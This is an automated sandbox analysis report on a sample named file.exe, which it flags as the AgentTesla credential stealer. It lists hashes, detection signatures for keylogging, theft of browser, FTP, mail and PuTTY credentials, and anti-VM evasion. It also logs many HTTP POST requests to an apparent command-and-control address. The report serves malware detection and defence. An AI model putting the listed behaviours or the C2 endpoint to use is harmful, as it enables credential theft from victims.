Loading ...

Play interactive tourEdit tour

Analysis Report file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:339128
MD5:2e1fcfb191508fc51320313d059bd30d
SHA1:18254fc83a340ca9562844542425ed7f995bff4a
SHA256:5dd60a5a2e5f074435cb438d3e229d1a3c4e4ef35c9c886a356b52aeb83265cd
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains very large array initializations
Installs a global keyboard hook
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • file.exe (PID: 5448 cmdline: 'C:\Users\user\Desktop\file.exe' MD5: 2E1FCFB191508FC51320313D059BD30D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.8d0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.0.file.exe.8d0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: file.exeAvira: detected
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: file.exeVirustotal: Detection: 53%Perma Link
                  Source: file.exeReversingLabs: Detection: 47%
                  Machine Learning detection for sampleShow sources
                  Source: file.exeJoe Sandbox ML: detected
                  Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: mscorrc.pdb source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 574Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 3420Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
